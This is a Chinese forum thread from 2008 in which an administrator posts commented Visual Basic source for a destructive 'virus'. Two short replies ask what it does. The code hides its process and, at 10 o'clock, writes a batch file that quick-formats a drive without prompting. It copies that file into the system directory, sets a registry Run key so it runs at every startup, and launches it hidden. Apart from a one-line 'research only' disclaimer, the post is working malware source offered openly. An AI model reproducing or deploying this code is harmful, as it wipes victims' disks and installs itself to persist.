找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 969|回复: 2

找到的病毒代码有兴趣的来看下

[复制链接]

0

主题

9

回帖

12

牛毛

初生牛犊

积分
12
发表于 2008-1-25 06:17:42 | 显示全部楼层 来自 海南省澄迈县
干什么的????????不懂!

0

主题

19

回帖

26

牛毛

初生牛犊

积分
26
发表于 2008-1-25 12:59:06 | 显示全部楼层 来自 山东省济南市
什么病毒的??

739

主题

468

回帖

4307

牛毛

论坛管理员

狼群

积分
4347
 楼主| 发表于 2008-1-21 16:24:50 | 显示全部楼层 |阅读模式
此代码仅供研究,请勿乱用


[SCC]
SCC=This is a source code control file
[VB病毒.vbp]
SCC_Project_Name=this project is not under source code control
SCC_Aux_Path=<This is an empty string for the mssccprj.scc file>

Attribute VB_Name = \"Module1\"
Sub Main() &#39;启动时必须要有Sub Main()或着是一个窗体,病毒当然不需要窗体
App.TaskVisible = False &#39;让病毒不显示进程,增加隐蔽性
On Error Resume Next &#39;出现错误忽略并继续运行
Dim nowtime, nowtime2
nowtime = Time$ &#39;获取当前时间
nowtime2 = Left$(nowtime, 2) &#39;截取前两位数字
If nowtime2 = \"10\" Then GoTo A: &#39;条件判断,如果前两位数字为10就转到A
If nowtime2 <> \"10\" Then GoTo B: &#39;如果不等于10就转到B
A:
Dim aa$, jj%, DesLocation
aa = StrReverse(Environ(\"ComSpec\"))
jj = InStr(aa, \"\\\")
winsys = StrReverse((Trim(Mid(aa, jj + 1, Len(aa) - jj))))
DesLocation = winsys & \"\\WinComputerclosed.bat\" &#39;获取系统目录
Dim systempath
systempath = winsys
Select Case systempath &#39;进入字符串筛选
Case \"C:\\windows\\system32\" &#39;当系统目录在C盘的时候
Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
&#39;在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format d /q /autotest /u\"
&#39;打开刚生成的批处理文件,将格式化D盘命令写入其中
Close #1 &#39;关闭批处理文件
Case \"D:\\windows\\system32\" &#39;当系统目录在D盘的时候
  Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
&#39;在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format e /q /autotest /u\"
&#39;打开刚生成的批处理文件,将格式化E盘命令写入其中
Close #1 &#39;关闭批处理文件
Case \"E:\\windows\\system32\" &#39;当系统目录在E盘的时候
  Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
&#39;在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format f /q /autotest /u\"
&#39;打开刚生成的批处理文件,将格式化F盘命令写入其中
Close #1 &#39;关闭批处理文件
Case \"F:\\windows\\system32\" &#39;当系统目录在F盘的时候
  Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
&#39;在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format c /q /autotest /u\"
&#39;打开刚生成的批处理文件,将格式化C盘命令写入其中
Close #1 &#39;关闭批处理文件
End Select &#39;结束筛选
Dim Location &#39;定义一个变量,用来储存病毒原体所在路径
Location = App.Path & \"\\WinComputerclosed.bat\"
FileCopy Location, DesLocation &#39;文件复制,将病毒原体复制到系统目录下
Dim Reg
Set Reg = CreateObject(\"wscript.Shell\") &#39;创建有个wscript.shell对象
Reg.RegWrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WinComputerclosed\", \"C:\\WINDOWS\\SYSTEM\\WinComputerclosed.bat\"
&#39;将病毒写入注册表,随电脑开启而启动
Shell App.Path & \"\\WinComputerclosed.bat\", vbHide &#39;隐藏运行病毒原体,关闭电脑。
B:
End
End Sub
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-11 13:58 , Processed in 0.127782 second(s), 35 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表